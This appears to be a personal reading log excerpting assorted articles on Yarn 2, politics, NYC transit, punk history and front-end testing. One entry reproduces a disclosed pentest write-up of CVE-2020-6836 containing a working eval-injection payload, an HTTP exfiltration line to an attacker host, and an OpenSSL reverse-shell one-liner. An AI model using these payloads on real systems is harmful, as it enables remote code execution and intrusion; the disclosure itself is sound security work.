shell interpreter that knows just enough to give you 90% of the language structures typically used in the scripts field. Thanks to this interpreter, your scripts will run just the same regardless of whether they're executed on OSX or Windows: Even better, this shell allows us to build tighter integrations, such as exposing the command line arguments to the user scripts: Improved Peer Dependency Links Because Node calls realpath on all required paths (unless --preserve-symlinks is on, which is rarely the case), peer dependencies couldn't work through yarn link as they were loaded from the perspective of the true location of the linked package on the disk rather than from its dependent. Thanks to Plug’n’Play which can force Node to instantiate packages as many times as needed to satisfy all of their dependency sets, Yarn is now able to properly support this case. New Lockfile Format Back when Yarn was created, it was decided that the lockfile would use a format very similar to YAML but with a few key differences (for example without colons between keys and their values). It proved fairly annoying for third-party tools authors, as the parser was custom-made and the grammar was anything but standard. Starting from Yarn 2, the format for both lockfile and configuration files changed to pure YAML: "@yarnpkg/parsers@workspace:^2.0.0-rc.6, @yarnpkg/parsers@workspace:packages/yarnpkg-parsers": version: 0.0.0-use.local resolution: "@yarnpkg/parsers@workspace:packages/yarnpkg-parsers" dependencies: js-yaml: ^3.10.0 pegjs: ^0.10.0 languageName: unknown linkType: soft TypeScript Codebase While it might not directly impact you as a user, we've fully migrated from Flow to TypeScript. One huge advantage is that our tooling and contribution workflow is now easier than ever. And since we now allow building Yarn plugins, you'll be able to directly consume our types to make sure your plugins are safe between updates. export interface Package extends Locator { version: string | null, languageName: string, linkType: LinkType, dependencies: Map&lt;IdentHash, Descriptor&gt;, peerDependencies: Map&lt;IdentHash, Descriptor&gt;, dependenciesMeta: Map&lt;string, Map&lt;string | null, DependencyMeta&gt;&gt;, peerDependenciesMeta: Map&lt;string, PeerDependencyMeta&gt;, }; Modular Architecture I recently wrote a whole blog post on the subject so I won't delve too much into it, but Yarn now follows a very modular architecture. In particular, this means two interesting things: You can write plugins that Yarn will load at runtime, and that will be able to access the true dependency tree as Yarn sees it; this allows you to easily build tools such as Lerna, Femto, Patch-Package, ... You can have a dependency on the Yarn core itself and instantiate the classes yourself (note that this part is still a bit experimental as we figure out the best way to include the builtin plugins when operating under this mode). To give you an idea, we've built a typescript plugin which will automatically add the relevant @types/ packages each time you run yarn add. Plugins are easy to write - we even have a tutorial -, so give it a shot sometime! Normalized Configuration One very common piece of feedback we got regarding Yarn 1 was about our configuration pipeline. When Yarn was released we tried to be as compatible with npm as possible, which prompted us to for example try to read the npm configuration files etc. This made it fairly difficult for our users to understand where settings should be configured. initScope: yarnpkg npmPublishAccess: public yarnPath: scripts/run-yarn.js In Yarn 2, the whole configuration has been revamped and everything is now kept within a single source of truth named .yarnrc.yml. The settings names have changed too in order to become uniform (no more experimental-pack-script-packages-in-mirror vs workspaces-experimental), so be sure to take a look at our shiny new documentation. Strict Package Boundaries Packages aren't allowed to require other packages unless they actually list them in their dependencies. This is in line with the changes we made back when we introduced Plug'n'Play more than a year ago, and we're happy to say that the work we've been doing with the top maintainers of the ecosystem have been fruitful. Nowadays, very few packages still have compatibility issues with this rule. // Error: Something that got detected as your top-level application // (because it doesn't seem to belong to any package) tried to access // a package that is not declared in your dependencies // // Required package: not-a-dependency (via "not-a-dependency") // Required by: /Users/mael/my-app/ require(`not-a-dependency`); Deprecating Bundle Dependencies Bundle dependencies are an artefact of another time, and all support for them has been dropped. The installs will gracefully degrade and download the packages as originally listed in the dependencies field. Should you use bundle dependencies, please check the Migration Guide for suggested alternatives. Read-Only Packages Packages are now kept within their cache archives. For safety and to prevent cache corruptions, those archives are mounted as read-only drives and cannot be modified under normal circumstances: const {writeFileSync} = require(`fs`); const lodash = require.resolve(`lodash`); // Error: EROFS: read-only filesystem, open '/node_modules/lodash/lodash.js' writeFileSync(lodash, `module.exports = 42;`); If a package needs to modify its own source code, it will need to be unplugged - either explicitly in the dependenciesMeta field, or implicitly by listing a postinstall script. Conclusion Wow. That's a lot of material, isn't it? I hope you enjoy this update, it's the culmination of literally years of preparation and obstinacy. Everything I believe package management should be, you'll find it here. The result is for sure more opinionated that it used to be, but I believe this is the way going forward - a careful planning of the long term user experience we want to provide, rather than a toolbox without directions. As for me, working on Yarn has been an incredible experience. I'm simultaneously project manager, staff engineer, lead designer, developer relations, and user support. There are ups and downs, but every time I hear someone sharing their Yarn success story my heart is internally cheering a little bit. So do this: tell me what you like, and help fix what you don't. Happy 2020! 🎄 Source: Introducing Yarn 2 ! 🧶🌟 – DEV Community 👩‍💻👨‍💻

    Read at 08:13 pm, Jan 24th

  • Tenant unions: building dual power in the neighborhood

    So we see that the crisis of modern society is not without issue. It contains the seeds of something new, which is emerging even now. But the new will not come about automatically.

    Read at 02:37 pm, Jan 24th

  • Electoral Road to Socialism?

    The present trade unions in the USA tend to obsess about following the law.

    Read at 02:26 pm, Jan 24th

  • Silicon Valley Abandons the Culture That Made It the Envy of the World

    For decades, whole regions, nations even, have tried to model themselves on a particular ideal of innovation, the lifeblood of the modern economy.

    Read at 02:15 pm, Jan 24th

  • Announcing styled-components v5: Beast Mode 💪🔥

    EJ: Updated January 13, 2020 with the formal v5 release. We are very excited to announce that the styled-components v5 is here! There are no breaking changes, as long as your app is running the latest version of React, styled-components v5 should just work. ✨

    Read at 12:18 pm, Jan 24th

  • Next.js 9.2

    We are excited today to introduce Next.js 9.2, featuring: Built-In CSS Support for Global Stylesheets: Applications can now directly import .css files as global stylesheets. Built-In CSS Module Support for Component-Level Styles: Leveraging the .module.

    Read at 04:04 am, Jan 24th

  • No to Chinese Authoritarianism, No to "Yellow Peril"

    The People’s Republic of China (PRC)’s rise in recent decades has confounded the Western left.

    Read at 02:35 am, Jan 24th

  • Gutenberg Can Tackle the Problems the Fields API Tried to Solve

    The Fields API. Never heard of it? That’s OK. Outside of the inner development community, it is not widely known. The average WordPress user does not need to know about it.

    Read at 02:31 am, Jan 24th

  • Sanders apologizes to Biden for surrogate's op-ed alleging he has a "big corruption problem"

    "It is absolutely not my view that Joe is corrupt in any way. And I'm sorry that that op-ed appeared," Sanders told CBS News. While Teachout does not officially work on the Sanders campaign, she stumps for him, and has introduced and endorsed him.

    Read at 02:26 am, Jan 24th

  • WebSockets for fun and profit

    Seamless communication is a must on the modern web. As internet speeds increase, we expect our data in real time. To address this need, WebSocket, a popular communication protocol finalized in 2011, enables websites to send and receive data without delay.

    Read at 12:02 am, Jan 24th

Day of Jan 23rd, 2020

  • The Twitter Electorate Isn’t the Real Electorate

    Does Twitter matter? The temptation is to say no. Its user base is small compared with Facebook—321 million monthly active users versus more than 2 billion—and a quick glance at the trending topics reveals its fractious, claustrophobic atmosphere.

    Read at 11:54 pm, Jan 23rd

  • Paper Plates from Jersey Make Scamming NYC Easy! – Streetsblog New York City

    .entry-header Tomorrow night, Manhattan Borough President Scott Stringer will join the Community Board 12 Public Safety Committee and NYPD officials for a public meeting on out-of-control drivers in Inwood and Washington Heights. Motorcycles confiscated by the 34th Precinct in Upper Manhattan. Photo: Manhattan Times Reckless driving isn’t new or unique to Upper Manhattan, of course, but […] .entry-header An out-of-the-way no parking zone next to the Inwood Hill Park playground has become a hotbed of public space theft. .entry-header The Inwood Greenmarket, on Isham Street, can tolerate a handful of parked cars … In August, the Manhattan Times reported that the city’s Greenmarket program was considering a new location at W. 185th Street, near Bennett Park, in Washington Heights. It seems the effort was started by Heights resident and cyclist Marisa Panzani, who was […] .entry-header It's been tried all over the country, with some big hiccups. But parking management could succeed here. The key word is "could." .entry-header The city recently replaced four parking spots at Park Terrace West and W. 218th Street, in Inwood, with a no standing zone. The 34th Precinct reportedly requested the change to give drivers exiting Park Terrace West, a northbound one-way street, a better view of east-west traffic on 218th. Inevitably, car owners accustomed to parking at […] .entry-header We asked for photos of NYC’s worst sidewalk-hogging businesses, and readers responded. We relaxed our guidelines a little to make room for government agencies. In the arena of public institutions that show no respect for people on foot, the United States Postal Service and employees of Metro-North in Harlem deserve special recognition. Not surprisingly, car-related […] Source: Paper Plates from Jersey Make Scamming NYC Easy! – Streetsblog New York City

    Read at 10:55 pm, Jan 23rd

  • Reverse shell through a node.js math parser - TRUESEC Blog

    CVE-2020-6836 Recently, I performed a penetration test of a typical single-page application, exposing a static React web app and a REST API written in Node.js. This article details how I discovered and exploited a critical vulnerability (now known as CVE-2020-6836) that allowed unauthenticated arbitrary remote code execution. The API had an endpoint that was kind of interesting. It had a parameter that seemed to be interpreted as a mathematical expression (similar to how Excel interprets such expressions). As it turns out, it made use of a module named hot-formula-parser[1] which has about 38 000 weekly downloads and 39 dependents. The module is more or less an advanced calculator. This kind of functionality is always interesting for a penetration tester because they tend to be more powerful than the developer realize. The application passed user controlled input to the parse function of the module. The below code does just that and will be used for throughout the article. var express = require("express") var app = express(); var FormulaParser = require("hot-formula-parser").Parser; app.post('/formula', function(req, res) { var parser = new FormulaParser(); var output = parser.parse(req.body.calc); // &lt;---- res.send(output); }); app.listen(3000, function() { console.log("Listening on port 3000"); }); Legitimate usage of the app would look like this: curl -H "Content-Type: application/json" -X POST -d '{"calc":"(SUM([1,2])-1)*2"}' http://TARGET:PORT/formula Giving the result ‘4’: {"error":null,"result":4} Nothing special, but under the hood something interesting has happened. Looking at the commit history of the module, we can see that version 3.0.0 used the dangerous function eval to parse arrays. Eval is a function that dynamically evaluates code, not only arrays. Basically any javascript we submit should be executed. To test it out we could perform a time consuming request, following the concept of ‘time based exploitation’, we’ll know that it works if (and only if) the website takes longer to load than normal. We’ll make the application sleep by invoking the function execSync with the argument sleep 10. The execSync function is executed in the main thread and thus blocks the execution until the command has completed. Finally, we write it all inside a self-invoking function (note the parenthesis at the end). curl -H "Content-Type: application/json" -X POST -d '{"calc":"SUM([(function(){require("child_process").execSync("sleep 10")})(),1])"}' http://TARGET:PORT/formula We execute and…… tada! The page took a bit over 10 seconds to load! At this point it is very likely that the application is vulnerable. To be sure we can try a number of different delays, and we notice that the delay is actually working as we instruct it to. By the way, in the actual penetration test, this is where you stop and rapidly ask the customer to take down the application from production. However, for the sake of this article, let’s see what the impact of this vulnerability really was. To start with — we are still blind. We want to execute a command and get back the output of the command. How could we get back the stdout though? There are a few ways to do this. We will make a HTTP request containing the stdout back to an attacker controlled web server. In code it would look like the below: (function() { require("child_process").exec(COMMAND, function(code,stdout) { require("http").get("http://ATTACKER:PORT/?x="+stdout) }) })() We put the code into the vulnerable parameter and send the request using Burp: We executed the command whoami and got back the value root. This is the name of the account running the vulnerable application. Popping a shell At this point we have what is known as a non-interactive shell, but that’s very tedious to work with. We probably want to get interactive by spawning a shell. There are many techniques to do this since we are able to execute arbitrary server-side javascript. Anyways, I wanna show a neat technique from GTFOBins[2] that serves well for a PoC like this. Don’t interpret this as the one way and think you are immune just because you for example drop outgoing connections like the one below. We will get a TLS encrypted reverse shell by abusing a program that likely already exist on the victim machine, namely OpenSSL. The code will look as follows: (function() { var c = require('child_process'); c.exec("mkfifo .s"); c.exec("/bin/sh -i &lt; .s 2&gt;&amp;1 | openssl s_client -quiet -connect ATTACKER:PORT &gt; .s"); c.exec("rm .s"); })() In a nutshell, what we are doing is: Create a named pipe “.s” (FIFO special file), which is very similar to a pipe. Two processes can open it on each end, and send data back and forth. Spawn an interactive Bourne shell, and: Redirect the named pipe to the shell’s stdin. Pipe the shell’s stdout/err to OpenSSL’s stdin. Connect to the server using OpenSSL’s built-in test client, and: Send OpenSSL stdin (i.e. shell’s stdout/err) to the remote host. Redirect data received from the remote host to the named pipe (i.e. shell stdin). Finally, remove the special file from disk. You could also use the -proxy flag if you need it to be proxy aware. On the attacker side we generate a certificate and start a listener: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -accept *:PORT After some final touches we send it: And then, voila! Disclosure timeline 2019-12-14: Reported to NPM 2019-12-18: Vulnerability confirmed by NPM security team 2020-01-09: Advisory published by NPM [3] 2020-01-11: CVE-2020-6836 assigned by MITRE [4] The vulnerability exploited in this article is fixed in hot-formula-parser version 3.0.1. References [1] https://www.npmjs.com/package/hot-formula-parser [2] https://gtfobins.github.io/ [3] https://www.npmjs.com/advisories/1439 [4] https://nvd.nist.gov/vuln/detail/CVE-2020-6836 Want to learn more? Alexander is speaking at the two-day event Cyber Security Summit 2020. A great time to ask him more questions about this or other findings! If you need an even deeper understanding and training join our class – “Cybersecurity attacks and defenses&nbsp;– Red vs. blue team!” on Geek Week with Alexander as one of the instructors! Source: Reverse shell through a node.js math parser – TRUESEC Blog

    Read at 10:44 pm, Jan 23rd

  • Andy Byford, New York City’s Subway Chief, Resigns - The New York Times

    He arrived nearly two years ago to turn around the city’s failing subway, making significant progress. Andy ByfordCredit...Chang W. Lee/The New York Times Two years after he arrived to turn around New York City’s failing subway, Andy Byford resigned on Thursday. Mr. Byford, a British transit veteran who oversaw the subway and buses as the president of New York City Transit, made significant progress during his tenure. But he also repeatedly tangled with Gov. Andrew M. Cuomo over dueling visions for the future of the transit system. “I’m very proud of what we have achieved as a team over the past two years and I believe New York City Transit is well-placed to continue its forward progress,” Mr. Byford said in a statement. His departure, which was first reported by Politico, could jeopardize the current campaign to fix the subway. He had ambitious plans to transform the system and a unique mix of charisma and a dogged work ethic that made New Yorkers believe in him. His arrival in January 2018 was celebrated as a turning point for the subway, and profiles in The New Yorker and on 60 Minutes followed. Only 58 percent of trains were on time the month that Mr. Byford started. There were near constant meltdowns and several train derailments raised safety concerns. Mr. Byford helped push the on-time rate over 80 percent through a series of operational changes and a focus on the basics. He said he wanted to bring the on-time rate into the 90s and proposed an ambitious overhaul of the subway’s ancient signal equipment. But Mr. Byford struggled to get along with Mr. Cuomo, who controls the subway and the flow of money to the system. Colleagues say both men have supersize egos and wanted credit for the subway’s success. They quarreled over plans to fix the L train and new technology to upgrade signals. Some believed Mr. Byford’s rock star status may have irked Mr. Cuomo. They compared the dynamic to Mayor Rudolph W. Giuliani and his police commissioner, William J. Bratton, who resigned in 1996 shortly after being on the cover of Time magazine. When Mr. Byford publicly questioned Mr. Cuomo’s decision to call off the shutdown of the L train tunnel between Manhattan and Brooklyn, Mr. Byford suddenly found himself sidelined. The two men did not speak for four months in 2019. Their relationship appeared to improve in recent months. Then Mr. Byford tried to resign in October, citing concerns over budget cuts and interference by Mr. Cuomo’s office. His bosses at the transit agency convinced him to stay, but the détente did not last long. “Andy Byford will be departing New York City Transit after a successful two years of service and we thank him for his work,’’ said Patrick J. Foye, the chairman of the Metropolitan Transportation Authority, the agency that operates the subway. “Andy was instrumental in moving the system forward, enacting the successful Subway Action Plan and securing record capital funding with the Governor and the Legislature, and we wish him well in his next chapter.” Source: Andy Byford, New York City’s Subway Chief, Resigns – The New York Times

    Read at 05:19 pm, Jan 23rd

  • 'This movement is just beginning': homeless moms evicted after taking over vacant house

    For almost two months, an unassuming white house on Magnolia Street in Oakland was home for Dominique Walker and her family. Her one-year-old son, Amir, took his first steps in the living room. He said his first words there, too – “thank you”.

    Read at 02:59 pm, Jan 23rd

  • Trump Privately Obsessed With Bernie Sanders’ Popularity and Socialism’s Appeal

    In public, President Donald Trump has fixated on mocking Sen. Bernie Sanders (I-VT) as “crazy” and has focused on assuring supporters of how badly he’d crush the left-wing senator in a general election and protect them from Sanders’ creeping socialism.

    Read at 02:47 pm, Jan 23rd

  • TypeScript's Secret Parallel Universe

    Almost four years ago, I was a new TypeScript user, amazed by the possibilities that this freshly learned JavaScript dialect opened up to me. But just like every TypeScript developer, I soon ran into some hard-to-debug problems.

    Read at 02:44 pm, Jan 23rd

  • Municipalist Syndicalism: From The Workplace to The Community

    Union membership in the United States is at its lowest level in decades. Nonetheless, unions have hit a 50-year high in public approval. Enthusiasm for unions is not manifesting solely in polls, but also in shop floor organizing by young and lower middle-aged workers.

    Read at 02:42 pm, Jan 23rd

  • The forgotten story of Pure Hell, America’s first black punk band | Dazed

    The four-piece lived with the New York Dolls and played with Sid Vicious, but they’ve been largely written out of cultural history WhiteSpaceFilter: Exclude An essential part of learning history is questioning it, asking what has become part of our cultural memory and what might have been left out. When it comes to the history of punk music, there are few bands who have been as overlooked as Pure Hell. The band’s story began in West Philadelphia in 1974, when four teenagers – lead vocalist Kenny ‘Stinker’ Gordon, bassist Lenny ‘Steel’ Boles, guitarist Preston ‘Chip Wreck’ Morris and drummer Michael ‘Spider’ Sanders, set out to follow in the footsteps of their musical idols. A shared obsession with the sounds of Iggy, Bowie, Cooper, and Hendrix inspired them to create music that was louder, faster and more provocative than even those artists’ most experimental records. Pure Hell’s unique sound led them to New York, where they became characters in a seminal subculture recognised today as punk. As musicians of colour, their contribution to a predominately white underground scene is all the more significant. “We were the first&nbsp;black punk band in the world,” says Boles. “We were the ones who paid the dues for it, we broke the doors down. We were genuinely the first. And we still get no credit for it.” The title of the ‘first black punk band’ has, in recent years, been informally given to Detroit-based Death, whose music was mostly unheralded at the time but has since been rediscovered and praised for its progressive ideas. But while Death were creating proto-punk music in isolation in the early 1970s, Pure Hell was completely entrenched in the New York City underground scene, living and performing alongside the legends of American punk. Arriving the same month that Patti Smith and Television began their two-month residencies at CBGB and leaving just after Nancy Spungen’s murder, Pure Hell’s active years in the city aligned perfectly with the birth and death of a dynamic chapter of music history. “I don’t want to be remembered just because we were black,” says Kenny Gordon. “I want to be remembered for being a part of the first tier of punk in the 70s.” Being just 155km from Greenwich Village, Philadelphia was somewhat of a pipeline of New York subculture – Gordon remembers his teenage years at the movie theatre watching John Waters films like Polyester and Pink Flamingos, and hanging out at Artemis, a spot frequented by Philly scenesters like Nancy Spungen and Neon Leon. “I heard (The Rolling Stones’) ‘Satisfaction’ and knew it was the kind of music I wanted to play,” recalls bassist Lenny Boles. “I was too poor to afford instruments, so if someone had one, I would befriend them.” Pure HellCourtesy of Pure Hell WhiteSpaceFilter: Exclude The quad quickly gained notoriety on their home turf. “Growing up in West Philadelphia, which was all black, we were some of the craziest guys you could have possibly seen walking the streets back then,” says Gordon. “We dressed in drag and wore wigs, basically daring people to bother us. People in the neighbourhood would say, ‘Don’t go into houses with those guys, you may not come out!’” Pure Hell swan dove into the New York underground scene in 1975, in pursuit of the people, places, and sounds they’d read about for years in the pages of Rock Scene and Cream magazine. The band moved into the Chelsea Hotel, the temporary home of a long list of influential characters, including Bob Dylan, Leonard Cohen, Janis Joplin, Jim Morrison, Edie Sedgwick, Patti Smith, and Robert Mapplethorpe. Their first gig in the city was hosted at Frenzy’s thrift, a storefront on St. Marks place, where guitarist Preston Morris “rather memorably caught the amplifier on fire due to a combination of maximum volume and faulty wires”, says Gordon. Drummer Michael Sanders’ friendship with Neon Leon led the band to the New York Dolls, who were acting as mentors for younger artists like Debbie Harry and Richard Hell at the time. Pure Hell was soon invited to perform for the Dolls in their loft. “We were the first black punk band in the world... and we still get no credit for it” – Lenny Boles, Pure Hell bassist “Honestly, we were scared to death of them,” Boles says. “When we walked in, they were all dressed up, smoking joints and watching The Untouchables on TV. Fortunately, we played and blew them away.” Gordon adds: “Underneath their outer appearance, they were just a bunch of guys from Queens. We had the same lingo. We were both really street and really genuine. It’s like, they were white but playing black, and we were just the opposite. We were innovative and they definitely appreciated us for it.” After being kicked out of the Chelsea for not paying rent, Pure Hell moved into the Dolls’ loft. “Everybody hated us at first. We had a bad reputation because of our association with the New York Dolls, who were doing a lot of dope at the time,” says Boles. “The way we looked, everybody thought we were in a gang. Actually, we used to live in gang territory in West Philly, and people were always trying to get us to join. We never did. And with a name like Pure Hell, people thought we were devil worshippers.” Gordon adds: “This was New York City, this was punk. People don’t realise it was ruthlessly competitive. It was dog eat dog.” Although they felt that few people were on their side, their kinship with Johnny Thunders led to numerous gigs at Andy Warhol’s haunt, Max’s Kansas City, and Mother’s, a Chelsea gay bar turned punk club, where Blondie first performed. The band was featured in a number of publications, namely Warhol’s own Interview magazine, marking their ‘place’ in a scene cultural influencers. Pure Hell with Sid Vicious in Melody Maker magazine. Early punk artists often flirted with Nazi symbolism for shock value.Courtesy of Pure Hell WhiteSpaceFilter: Exclude Despite their growing presence in the underground, Pure Hell still didn’t have a manager. After reading a biography of Jimi Hendrix by Curtis Knight, the singer and frontman of Hendrix’s first band The Squires, Lenny Boles chased down the author’s address and arrived on his doorstep. Boles’ bold act of promotion earned them management from the man credited with Hendrix’s discovery. Kathy Knight, Curtis’s then-partner in life and business, recalls her ex-husband’s first impressions of Pure Hell. “He loved them immediately,” she says. “After Lenny knocked on the door, Curtis brought me to one of the clubs where they were performing on Bleecker Street. Stinker (Kenny Gordon) almost landed in my lap when he did a backflip off the stage. We were so blown away that we put everything we had into them at the time.” Those who saw Pure Hell in action describe their shows similarly. Gordon’s background in gymnastics gave them an unparalleled stage presence, with choreography that he says he performed “crash dummy style”. Pure Hell’s sound was harsher than their peers and predecessors and is today recognised as proto-hardcore. “We were like four Jimi Hendrixes, and Curtis knew it,” Gordon says. “We aimed for impact, just because we could. A lot of people at the time couldn’t play like Chip, doing Hennessy licks and everything. Not everyone could copy that.” Curtis and Kathy Knight were so enthusiastic about Pure Hell that they sacrificed three months of rent money for studio sessions. Knight organised Pure Hell’s first European tour in 1978, which resulted in their single “These Boots are Made for Walking” reaching number four in the UK alternative charts. Later, they opened for Sid Vicious at Max’s during his New York residency. It would end up being his last public appearance, and Pure Hell found themselves looped into the media circus surrounding Nancy Spungen’s death. “We were on the second page of the majority of the tabloids, like New Musical Express, Sounds, and Melody Maker,” says Gordon. But beyond their association with Vicious, Pure Hell’s European tour was a major success in part due to Curtis Knight’s strategic marketing campaign, which sensationalised their race. After arriving, Knight created a big poster with an image of the band taken by legendary rock photographer Bob Gruen in front of Buckingham Palace with the slogan: “From the United States of America, the world’s only black punk band”. Boles was angry at the time. “I said to Curtis, ‘Why do you have to call us a black band?’ Of course, that’s what we were, but we really didn’t think in those terms at the time. People in Europe were curious about the band before we even arrived. They were looking at it like a novelty. They didn’t believe we really existed.” Pure Hell live at Max’s Kansas City. Early punk artists often flirted with Nazi symbolism for shock value.Courtesy of Pure Hell WhiteSpaceFilter: Exclude Boles says the band&nbsp;was “plastered by this campaign”, but were able to reap its fruits while touring Holland and the UK. Landing smack dab in the middle of the London punk scene, Pure Hell were welcomed by a parallel movement that had clearer political convictions and more dynamic cross-cultural discourse. “All the punks listened to reggae,” says Boles. “It was about all rebel music.” Gordon adds that “people, incorrectly, view punk as this angry, white, urban, male genre. Black culture is really the source of punk, and a lot of people don’t recognise it – or don’t want to recognise it.” Although they eventually felt accepted in New York, and even celebrated in Europe, the legacy of Jim Crow still haunted the industry, where genres remained segregated. “We experienced racism, but didn’t know it at the time,” says Lenny Boles. “We were watching all of these bands around us, with far less talent, get signed. It had us second guessing ourselves, thinking we weren’t good enough. Obviously we were. It was a while before we realised we were getting snubbed.” While their white peers were being cut cheques, Pure Hell found themselves courted by a number of record labels, all of whom insisted they change their music in order to align with racial stereotypes. “Everybody was trying to make us do this Motown thing, saying like, ‘You guys are black so you’ve gotta do something that’s danceable,’” Boles adds. “They kept trying to make us more ‘funky’. Everything we liked had nothing to do with dance music. We were not having it. So we opted not to get signed.” “I don’t want to be remembered just because we were black. I want to be remembered for being a part of the first tier of punk in the 70s” – Kenny Gordon, Pure Hell vocalist Integrity and profitability don’t often go hand-in-hand, and Pure Hell’s refusal to comply with the industry’s limitations meant they sacrificed career opportunities. After a second European tour in 1979, the band suffered a fall-out with Knight. A messy legal conflict resulted in Knight flying back to the US alone, with the band’s master tapes in tow. Pure Hell remained in Europe without any of the rights, or access, to their recordings, which Kathy Knight salvaged after her husband attempted to destroy them. Pure Hell eventually finagled their way back to the US, where they settled in Los Angeles. Although they played historic bills at the Masque (LA’s equivalent to CBGB) with iconic groups like the Germs, the Cramps, and the Dead Boys, Pure Hell lost their momentum. With no management, no record deal, and no access to their recorded output, the band felt the flames of Pure Hell die out. “It was all totally over by 1980,” says Kenny Gordon. “Really, punk died with Nancy’s murder. Everyone was burning the candle from both ends. You had to be extreme to be in those kinds of circles.” Bad Brains’ explosion onto the music scene in the early 80s also left Pure Hell feeling robbed of their title of ‘the first black punk band’. “You know, we took the blow for being black, so why didn’t they give it to us in the end?” Boles asks.&nbsp;&nbsp; Pure HellCourtesy of Pure Hell WhiteSpaceFilter: Exclude As decades passed and history books were written, Pure Hell’s memory faded to legend. But in the early 2000s, Kathy Knight fatefully decided to auction off Pure Hell’s master tapes on eBay. Their unreleased album&nbsp;Noise Addiction&nbsp;was purchased by an enthusiastic Mike Schneider of Welfare Records. “Mike wanted them so badly he came himself to pick them up,” Knight recalls. Pure Hell’s legacy has also been promoted and protected by hardcore legend&nbsp;Henry Rollins of Black Flag, who tracked down the original acetate of the band’s first single and reissued it on his label 2.13.61, in collaboration with In the Red Records, last year. Rollins first learned of the band’s existence in 1979, after seeing their single at Yesterday &amp; Today Records in Rockville, Maryland, with his friend Ian MacKaye of Minor Threat and Fugazi. He remained on the lookout for traces of the band for over 30 years. “At auction time, I was able to secure the record,” Rollins says. “I listened to it and was amazed at how good it sounded. I checked in with Kenny (Gordon) and he confirmed it was the only source for the two songs.” Beyond simply highlighting and celebrating the rare black punk bands of the time, Pure Hell held particular significance to Rollins because their urban myth was real. “The rumour was that they had made an album and that it was sitting in a closet,” he says. “Noise Addiction, released in 2006, decades after it had been recorded, is really great. If the album had come out when they made it, that would have been a game changer. I believe (it) would have had a tremendous impact. It’s one of those missed opportunity stories.” In addition to Rollins, indie talent rep Gina Parker-Lawton ranks as one of Pure Hell’s greatest advocates. Parker-Lawton met drummer Michael Sanders on Sunset Boulevard in the 80s, and counted him as a friend during their overlapping years in LA. It was after she learned of Sanders’ death in 2003 that Parker-Lawton made contact with the other band members and became their publicist. “They were just kind of overlooked in all of the punk history books,” she says. “After learning their story and what they had actually accomplished, by being the first truly all-black punk band, I wanted to ensure they were remembered.” Parker-Lawton has since been advocating for their deserved place in music history, and recently helped secure their induction into the Smithsonian African American Museum of History and Culture. Their induction will be marked by the donation of Sanders’ leather jacket, which he wore on tour in Europe and around LA. Pure Hell’s story beckons essential questions about the integrity of our cultural memory, reminding us that “history” is written within the constructs of unjust society. “It’s just so important to me that history be correct,” says Parker-Lawton. “Taking the risks that they took, daring to be so different, they were outlaws and true pioneers. When people are that true to their art and that brave, it has to be recognised.” Although their musical careers didn’t necessarily bring wealth or fame, Boles and Gordon describe their years in Pure Hell as paramount. “I had so much fun, it doesn’t matter that I never saw a penny for it,” he says. “For us, it wasn’t about making money. It was about following our hearts and doing exactly what we wanted to do.” Source: The forgotten story of Pure Hell, America’s first black punk band | Dazed

    Read at 01:31 pm, Jan 23rd

  • Getting Started with Front End Testing — JavaScript January

    You can also check multiple pages and screen sizes and run multiple tests by adding to the promise array in your test function. You can define the viewport for each test (to test various screen sizes) different pages of your application. const results = await Promise.all([ pa11y(`http://localhost:65519`, { browser: browser, standard: 'WCAG2AAA', screenCapture: `$/results/pa11y_home_desktop.png`, viewport: { width: 1280, height: 1024, }, }), pa11y(`http://localhost:65519`, { browser: browser, standard: 'WCAG2AAA', screenCapture: `$/results/pa11y_home_mobile.png`, viewport: { width: 320, height: 480, isMobile: true, }, }), pa11y(`http://localhost:65519/blog-post`, { browser: browser, standard: 'WCAG2AAA', screenCapture: `$ ), ]) Visual Regression Testing Even if you're the only developer working on a project, it's still easy to make code changes that bleed into other areas of your application (I've been know to do that at times 😬). Visual regression testing can help stop that, and highlight any areas of your application that are visually different from before. BackstopJS is a good tool for running this, because it gives you starter config so you can hit the ground running. If you install backstop globally (npm install -g backstopjs), you can run their initialization command (backstop init) in your project folder and it'll create all the files for you, including the backstop.json config file. { "id": "backstop_default", "viewports": [ { "label": "phone", "width": 320, "height": 480 }, { "label": "tablet", "width": 1024, "height": 768 } ], "onBeforeScript": "puppet/onBefore.js", "onReadyScript": "puppet/onReady.js", "scenarios": [ { "label": "BackstopJS Homepage", "cookiePath": "backstop_data/engine_scripts/cookies.json", "url": "http://localhost:65519", "referenceUrl": "", "readyEvent": "", "readySelector": "", "delay": 0, "hideSelectors": [], "removeSelectors": [], "hoverSelector": "", "clickSelector": "", "postInteractionWait": 0, "selectors": [], "selectorExpansion": true, "expect": 0, "misMatchThreshold": 0.1, "requireSameDimensions": true } ], "paths": { "bitmaps_reference": "backstop_data/bitmaps_reference", "bitmaps_test": "backstop_data/bitmaps_test", "engine_scripts": "backstop_data/engine_scripts", "html_report": "backstop_data/html_report", "ci_report": "backstop_data/ci_report" }, "report": [ "browser" ], "engine": "puppeteer", "engineOptions": { "args": [ "--no-sandbox" ] }, "asyncCaptureLimit": 5, "asyncCompareLimit": 50, "debug": false, "debugWindow": false } Again, if you're using WSL, add the executable path the to config options in backstop.json "engine": "puppeteer", "engineOptions": { "args": [ "--no-sandbox" ], "executablePath": "/mnt/c/Program Files (x86)/Google/Chrome/Application/chrome.exe" }, Run the test using the backstop test command and it will save the results in the backstop_data/bitmaps_test folder under a separate folder for each test and launch a HTML report with the results. The first time you run the test it will fail as it doesn't have anything to compare it to, set the default screenshots by running backstop approve and run the test again. Source: Getting Started with Front End Testing — JavaScript January

    Read at 03:37 am, Jan 23rd

  • The Most Recent Time I Sniped Myself

    Self-sniping is the biggest problem in the programming industry among people my age. In my day, you didn’t get this way without Needing To Know for no good reason.

    Read at 02:59 am, Jan 23rd

  • Accessible page title in a single-page React application | Hugo Giraudel

